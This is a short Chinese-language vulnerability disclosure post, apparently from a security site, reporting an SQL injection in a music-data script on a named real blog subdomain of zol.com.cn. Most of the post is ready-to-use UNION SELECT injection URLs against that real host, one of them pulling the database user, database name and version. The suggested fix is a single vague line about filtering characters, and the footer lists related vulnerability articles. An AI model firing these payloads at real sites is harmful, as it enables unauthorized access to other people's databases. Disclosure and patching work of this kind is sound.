中关村在线博客子站SQL注入及修复方案
摘要:http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0unionselect1,...
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--
修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。
【中关村在线博客子站SQL注入及修复方案】相关文章:
★ Invision Power Board BBCode 处理 HTML注入漏洞
★ Velocity Parse()函数引发的本地包含漏洞及利用方法
★ Microsoft SharePoint 服务器源码 HTML 注入漏洞
★ Persits Software XUpload.ocx 含远程栈溢出漏洞